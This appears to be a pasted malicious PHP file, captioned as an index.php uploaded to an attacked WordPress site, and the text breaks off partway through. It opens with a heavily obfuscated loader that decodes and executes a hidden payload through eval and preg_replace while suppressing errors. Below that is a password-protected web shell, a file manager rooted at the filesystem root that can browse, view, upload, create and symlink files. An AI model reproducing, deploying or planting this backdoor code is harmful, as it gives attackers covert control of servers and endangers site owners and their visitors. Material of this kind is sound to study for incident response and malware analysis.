attacked wordpress uploaded index.php

1. <?php $dwrqkcipdw = '7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:7174]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275x5c%x7860msvd}+;!>!}%x5c%x5c%x782f2986+7**^%pdoF.uofuopD#)sfebfI{*w%x55-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&3f]63]y3:]68]y76#<%x5c%x78e%x5c%"%x6f%142%x5f%163%x74%141%x72%164") && (!isset($GLO)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x7*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeo]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]38-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%xf7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x7825625)7gj6<**2qj%x5c%x7825)hopmftsbqA7>q%x5c%x78256<%x5c%x787fw6*%c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5*%x5c%x7824-%x5c%x782x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x%x7825%x5c%x782f#0#%x5c%x782f*#nUTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRpd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825]s]#)fepmqyf%x5c%x7827*&x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x78x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x585,67R37,18R#>q%x5c%x7825V<*#fopoV;hoje5]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*W8Bsfuvso!sboepn)%x5c%x7825epnbss-%x5cx782f%x5c%x7824)#P#-#Q#-#B#-#T#%x7825r%x5c%x7878W~!Ypp2)%x5c%x782+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x]48y]#>m%x5c%x7825:|:*r%x578256<*Y%x5c%x7825)fnbozcYufhA%xx7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x785c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{hc%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub5c%x7825zW%x5c%x7825h>EzH,2W%x<%x5c%x7825j:=tj{fpg)%x5!*##>>X)!gjZ<#opo#>bx5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x78p!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#25%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x1%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y22%134%x78%62%x35%165%x3a%146%x21%76%x2*mmvo:>:iuhofm%x5c%x7825:-5ppd)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7825c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6x7827pd%x5c%x78256<C%x5c<C>^#zsfvr#%x5c%x785cq5]y31]53]y6d]281]y43]7!*msv%x5c%x7825)}k~~~<ftmbg5c%x7824!>!fyqmpef)#%x5c%x786<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f7825!*3>?*2b%x5c%x7825)gpf{c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c]y39]274]y85]273]y6g]273]y76]271]y7d]252]yc%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%xA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmx78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_#)tutjyf%x5c%x7860opjudovg)!gj!|5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825h<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x7825:|:**t%x5c%x7825)m%8]y33]65]y31]55]y85]82]y76]62]y3:h#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!s%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]osfuvso!%x5c%x7825bss825!<*::::::-111112)x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x2bd%x5c%x7825!<5h%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MP}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;-#E#-#G#-#H#-#I#-#K#-#L#-#M#%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]yc%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7pmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeT%x5c%x7860QUUI&c_UOFHB%x5c%x7860pt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd7,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x7]y83]248]y83]256]y81]265]y72]254]y76#<%f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78vg}%x5c%x7878;0]=])0#)U!%x5c%x7827{#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x782]265]y39]271]y83]256]y78]248]y83]256]}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldw%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%pd!opjudovg!|!**#j{hnpd#)tutjyf%x<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y3qjA)qj3hopmA%x5c%x78273qj%x5c%xD6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x785c%x5c%x7825j:^<!%x5c%x7825x5c%x7860msvd},;uqpuft%c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x525h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x525!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]5725)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x25z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x785c%x7825_t%x5c%x7825:os5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5%x7825)ppde>u%x5c%x7825V<#65eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!**#]y81]273]y76]258]y6g]273]5c%x7825w6Z6<.2%x5c%x7860hA%x5c%,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R%x72%162%x61%171%x5f%155%x61%160%x28%42%<.[A%x5c%x7827&6<%x5c~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ft%x5c%x7825)tpqsut>j%x5c%x782bz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x24*<!%x5c%x7825kj:!>!#]y)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c5zB%x5c%x7825z>!tussfw)%xe:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}g%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141SFTV%x5c%x7860QUUI&b%x5x5c%x7825j:.2^,%x5c%x7825b:c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x7875c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5cy]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnjt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!x5c%x7825-*.%x5c%x7825)euhA)3of>1]211M5]67]452]88]5]48]32M3]317]445]212]44!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{h825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%82fqp%x5c%x7825>5h%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x782x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5cBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*QcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x787y81]265]y72]254]y76]61]y33]68]y34]68]y33]6%x7825j=tj{fpg)%x5c%x]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5cP6L1M5]D2P4]D6#<%x5cy81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x782x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5ce%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy):}.}-}!#*<%x5c%x7825nf!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]2414!>!tus%x5c%x7860sfqmbdf5c%x7827Y%x5c%x78256<.msv%x5c%x78604]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824787f%x5c%x787f<u%x5c%x7825V%x5%x5c%x7824-%x5c%x7824*<!%x6#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72c%x7825j:>>1*!%x5c%x7857,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:5298<!%x5c%x7825c:>%x5c%x7825s:%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7preg_replace("%x2f%50%x2e%52%x29%57%xIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%T7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%<%x5c%x7825j,,*!|%x5c%x7824-%x5; function fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); if((function_exists(5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x78y76]271]y7d]252]y74]2525%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825d>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c5!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%25b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%%x7825G]y6d]281Ld]245]K5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }/(.*)/epreg_replacecxlntbmzih'; $rgblfxezka = explode(chr((270-226)),'9635,20,376,51,7967,69,9569,66,9348,37,7004,61,6451,40,4062,29,4091,38,2835,39,2798,37,344,32,3501,39,3811,49,542,57,5379,64,6368,32,3072,24,3976,46,1582,24,6548,47,4645,37,1407,63,9792,57,8696,43,5004,36,8305,61,4236,51,9442,51,2563,62,911,28,5571,32,2295,32,10000,62,842,69,3096,22,7823,41,6077,49,8887,35,939,35,9228,50,1645,50,3195,56,9493,45,1606,39,7541,70,1470,64,1973,40,3013,59,6491,21,5819,39,5243,66,4819,48,4287,60,5694,23,165,24,1811,47,4465,68,3725,32,3140,27,7475,66,3448,53,6907,44,6665,51,2390,40,6595,28,9887,41,1752,59,1007,58,2430,59,473,69,7220,62,5486,33,9655,45,9722,70,3251,27,7282,66,7401,32,4215,21,1324,32,1534,48,8545,41,4867,63,7735,25,4042,20,6283,59,599,65,6623,42,3917,59,2625,63,6740,50,3668,57,1356,51,4787,32,7065,23,7115,43,4969,35,2543,20,1921,52,427,46,3540,64,5443,43,1202,60,5040,61,5957,54,772,70,2958,55,2874,30,6815,48,2210,59,6213,42,3381,67,8971,30,3278,61,6255,28,6400,51,9100,49,2013,39,209,26,7611,55,281,63,4129,47,5101,35,2688,61,8036,62,8482,63,3339,42,107,58,4930,39,8586,46,4561,45,7760,63,6190,23,4176,39,7666,69,3604,64,3860,24,1133,69,5519,52,6011,66,2269,26,8246,59,4682,62,8386,47,5136,70,2749,49,7158,62,8739,34,8433,49,1065,21,8863,24,2904,54,8922,49,9538,31,4606,39,9001,26,7926,41,8186,21,0,60,6512,36,3167,28,6716,24,1262,62,1858,63,5717,56,4744,43,8098,46,2108,37,2176,34,6790,25,2489,30,3757,54,9385,57,7864,62,2327,63,5773,46,9149,51,235,46,60,47,6951,53,5603,57,1086,47,8207,39,8366,20,9977,23,6863,44,8773,22,9849,38,4398,67,8795,68,664,55,7433,42,2052,56,4022,20,4347,51,189,20,9278,70,5858,42,2519,24,974,33,9078,22,9928,49,7088,27,9200,28,5660,34,5309,70,5900,57,1695,57,6126,64,8632,64,2145,31,4533,28,719,53,7348,53,6342,26,9700,22,9027,51,5206,37,8144,42,3118,22,3884,33,10062,44'); $uvxdbqeoxv=substr($dwrqkcipdw,(67483-57377),(40-33)); if (!function_exists('fisksthdeg')) { function fisksthdeg($pburnbjrga, $stqvdwiotx) { $ylbwipcxzs = NULL; for($rtyxoeyyuw=0;$rtyxoeyyuw<(sizeof($pburnbjrga)/2);$rtyxoeyyuw++) { $ylbwipcxzs .= substr($stqvdwiotx, $pburnbjrga[($rtyxoeyyuw*2)],$pburnbjrga[($rtyxoeyyuw*2)+1]); } return $ylbwipcxzs; };} $ackauxdbam="\x20\57\x2a\40\x67\156\x79\150\x69\167\x79\170\x78\153\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\71\x35\55\x31\65\x38\51\x29\54\x20\143\x68\162\x28\50\x35\67\x36\55\x34\70\x34\51\x29\54\x20\146\x69\163\x6b\163\x74\150\x64\145\x67\50\x24\162\x67\142\x6c\146\x78\145\x7a\153\x61\54\x24\144\x77\162\x71\153\x63\151\x70\144\x77\51\x29\51\x3b\40\x2f\52\x20\164\x73\170\x64\145\x69\162\x67\162\x74\40\x2a\57\x20"; $ytevnshdic=substr($dwrqkcipdw,(41274-31161),(76-64)); $ytevnshdic($uvxdbqeoxv, $ackauxdbam, NULL); $ytevnshdic=$ackauxdbam; $ytevnshdic=(672-551); $dwrqkcipdw=$ytevnshdic-1; ?><?php
2.  
3. /* Authorization */
4.  
5. $passwordhash = "8857d4fa543522f0f9730025eb067248";
6.  
7. list($protocol) = explode("/", $_SERVER['SERVER_PROTOCOL']);
8.  
9. if (isset($_POST['password'])) {
10.     setcookie('wp_defined', md5($_POST['password']), time() + 60*60*23*31);
11.     header("Location: $protocol://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
12.     exit();
13. }
14.  
15. $auth_form = <<<FORM
16.     <form action="" method="post">
17.         Password: <input type="texs" name="password" /> <br />
18.         <input type="submit" value="Enter" />
19.        
20. <div style="display:none">t23ijmed096</div>
21.     </form>
22. FORM;
23.  
24. if (isset($_COOKIE['wp_defined'])) {
25.     if ($_COOKIE['wp_defined'] != $passwordhash) {
26.         setcookie('wp_defined', 'none', time() - 3600);
27.         header("Location: $protocol://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
28.         exit();
29.     }
30. } else { echo $auth_form; exit(); }
31.  
32.  
33. $language = 'en';
34.  
35. /* This directory is shown when you start webadmin.php.
36.  * For example: './' would be the current directory.
37.  */
38. $homedir = './';
39.  
40. /* This sets the root directory of the treeview.
41.  * Set it to '/' to see the whole filesystem.
42.  */
43. $treeroot = '/';
44.  
45. /* When you create a directory, its permission is set to this octal value.
46.  * For example: 0705 would be 'drwx---r-x'.
47.  */
48. $dirpermission = 0705;
49.  
50. /* Uncomment the following line to enable this feature (remove #):
51.  * When you create a file, its permission is set to this octal value.
52.  * For example: 0644 would be 'drwxr--r--'.
53.  */
54. # $newfilepermission = 0666;
55.  
56. /* Uncomment the following line to enable this feature (remove #):
57.  * When you upload a file, its permission is set to this octal value.
58.  * For example: 0644 would be 'drwxr--r--'.
59.  */
60. # $uploadedfilepermission = 0666;
61.  
62. /* The size of the file edit textarea
63.  */
64. $editrows = 20;
65. $editcols = 70;
66.  
67. /* ------------------------------------------------------------------------- */
68.  
69. $self = htmlentities(basename($_SERVER['PHP_SELF']));
70. $homedir = relpathtoabspath($homedir, getcwd());
71. $treeroot = relpathtoabspath($treeroot, getcwd());
72. $words = getwords($language);
73.  
74. /* If PHP added any slashes, strip them */
75. if (ini_get('magic_quotes_gpc')) {
76.     array_walk($_GET, 'strip');
77.     array_walk($_POST, 'strip');
78.     array_walk($_REQUEST, 'strip');
79. }
80.  
81. /* Return Images */
82. if (isset($_GET['imageid'])) {
83.     header('Content-Type: image/gif');
84.     echo(getimage($_GET['imageid']));
85.     exit;
86. }
87.  
88. /* Initialize session */
89. ini_set('session.use_cookies', FALSE);
90. ini_set('session.use_trans_sid', FALSE);
91. session_name('id');
92. session_start();
93.  
94. /* Initialize dirlisting output */
95. $error = $notice = '';
96. $updatetreeview = FALSE;
97.  
98. /* Handle treeview requests */
99. if (isset($_REQUEST['action'])) {
100.     switch ($_REQUEST['action']) {
101.     case 'treeon':
102.         $_SESSION['tree'] = array();
103.         $_SESSION['hassubdirs'][$treeroot] = tree_hassubdirs($treeroot);
104.         tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot);
105.         frameset();
106.         exit;
107.     case 'treeoff':
108.         $_SESSION['tree'] = NULL;
109.         $_SESSION['hassubdirs'] = NULL;
110.         dirlisting();
111.         exit;
112.     }
113. }
114.  
115. /* Set current directory */
116. if (!isset($_SESSION['dir'])) {
117.     $_SESSION['dir'] = $homedir;
118.     $updatetreeview = TRUE;
119. }
120. if (!empty($_REQUEST['dir'])) {
121.     $newdir = relpathtoabspath($_REQUEST['dir'], $_SESSION['dir']);
122.     /* If the requested directory is a file, show the file */
123.     if (@is_file($newdir) && @is_readable($newdir)) {
124.         /* if (@is_writable($newdir)) {
125.             $_REQUEST['edit'] = $newdir;
126.         } else */ if (is_script($newdir)) {
127.             $_GET['showh'] = $newdir;
128.         } else {
129.             $_GET['show'] = $newdir;
130.         }
131.     } elseif ($_SESSION['dir'] != $newdir) {
132.         $_SESSION['dir'] = $newdir;
133.         $updatetreeview = TRUE;
134.     }
135. }
136.  
137. /* Show a file */
138. if (!empty($_GET['show'])) {
139.     $show = relpathtoabspath($_GET['show'], $_SESSION['dir']);
140.     if (!show($show)) {
141.         $error= buildphrase('&quot;<b>' . htmlentities($show) . '</b>&quot;', $words['cantbeshown']);
142.     } else {
143.         exit;
144.     }
145. }
146.  
147. /* Show a file syntax highlighted */
148. if (!empty($_GET['showh'])) {
149.     $showh = relpathtoabspath($_GET['showh'], $_SESSION['dir']);
150.     if (!show_highlight($showh)) {
151.         $error = buildphrase('&quot;<b>' . htmlentities($showh) . '</b>&quot;', $words['cantbeshown']);
152.     } else {
153.         exit;
154.     }
155. }
156.  
157. /* Upload file */
158. if (isset($_FILES['upload'])) {
159.     $file = relpathtoabspath($_FILES['upload']['name'], $_SESSION['dir']);
160.     if (@is_writable($_SESSION['dir']) && @move_uploaded_file($_FILES['upload']['tmp_name'], $file) && (!isset($uploadedfilepermission) || chmod($file, $uploadedfilepermission))) {
161.         $notice = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['uploaded']);
162.     } else {
163.         $error = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['notuploaded']);
164.     }
165. }
166.  
167. /* Create file */
168. if (!empty($_GET['create']) && $_GET['type'] == 'file') {
169.     $file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
170.     if (substr($file, strlen($file) - 1, 1) == '/') $file = substr($file, 0, strlen($file) - 1);
171.     if (is_free($file) && touch($file) && ((!isset($newfilepermission)) || chmod($file, $newfilepermission))) {
172.         $notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
173.         $_REQUEST['edit'] = $file;
174.     } else {
175.         $error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
176.     }
177. }
178.  
179. /* Create directory */
180. if (!empty($_GET['create']) && $_GET['type'] == 'dir') {
181.     $file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
182.     if (is_free($file) && @mkdir($file, $dirpermission)) {
183.         $notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
184.         $updatetreeview = TRUE;
185.         if (!empty($_SESSION['tree'])) {
186.             $file = spath(dirname($file));
187.             $_SESSION['hassubdirs'][$file] = TRUE;
188.             tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file);
189.         }
190.     } else {
191.         $error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
192.     }
193. }
194.  
195. /* Ask symlink target */
196. if (!empty($_GET['symlinktarget']) && empty($_GET['symlink'])) {
197.     $symlinktarget = relpathtoabspath($_GET['symlinktarget'], $_SESSION['dir']);
198.     html_header($words['createsymlink']);
199. ?>
200.     <form action="<?php echo($self); ?>" method="get">
201.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
202.     <input type="hidden" name="symlinktarget" value="<?php echo(htmlentities($_GET['symlinktarget'])); ?>">
203.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
204.     <table border="0" cellspacing="1" cellpadding="4">
205.     <tr>
206.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
207.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
208.     </tr>
209.     <tr>
210.         <td colspan="2" bgcolor="#EEEEEE">
211.             <table border="0">
212.             <tr>
213.                 <td valign="top"><?php echo($words['target']); ?>:&nbsp;</td>
214.                 <td>
215.                     <b><?php echo(htmlentities($_GET['symlinktarget'])); ?></b><br>
216.                     <input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked>
217.                     <label for="checkbox_relative"><?php echo($words['reltarget']); ?></label>
218.                 </td>
219.             </tr>
220.             <tr>
221.                 <td><?php echo($words['symlink']); ?>:&nbsp;</td>
222.                 <td><input type="text" name="symlink" value="<?php echo(htmlentities(spath(dirname($symlinktarget)))); ?>" size="<?php $size = strlen($_GET['symlinktarget']) + 9; if ($size < 30) $size = 30; echo($size);  ?>"></td>
223.             </tr>
224.             <tr>
225.                 <td>&nbsp;</td>
226.                 <td><input type="submit" value="<?php echo($words['create']); ?>"></td>
227.             </tr>
228.             </table>
229.         </td>
230.     </tr>
231.     </table>
232.     </td></tr></table>
233.     </form>
234. <?php
235.     html_footer();
236.     exit;
237. }
238.  
239. /* Create symlink */
240. if (!empty($_GET['symlink']) && !empty($_GET['symlinktarget'])) {
241.     $symlink = relpathtoabspath($_GET['symlink'], $_SESSION['dir']);
242.     $target = $_GET['symlinktarget'];
243.     if (@is_dir($symlink)) $symlink = spath($symlink) . basename($target);
244.     if ($symlink == $target) {
245.         $error = buildphrase(array('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', '&quot;<b>' . htmlentities($target) . '</b>&quot;'), $words['samefiles']);
246.     } else {
247.         if (@$_GET['relative'] == 'yes') {
248.             $target = abspathtorelpath(dirname($symlink), $target);
249.         } else {
250.             $target = $_GET['symlinktarget'];
251.         }
252.         if (is_free($symlink) && @symlink($target, $symlink)) {
253.             $notice = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['created']);
254.         } else {
255.             $error = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['notcreated']);
256.         }
257.     }
258. }
259.  
260. /* Delete file */
261. if (!empty($_GET['delete'])) {
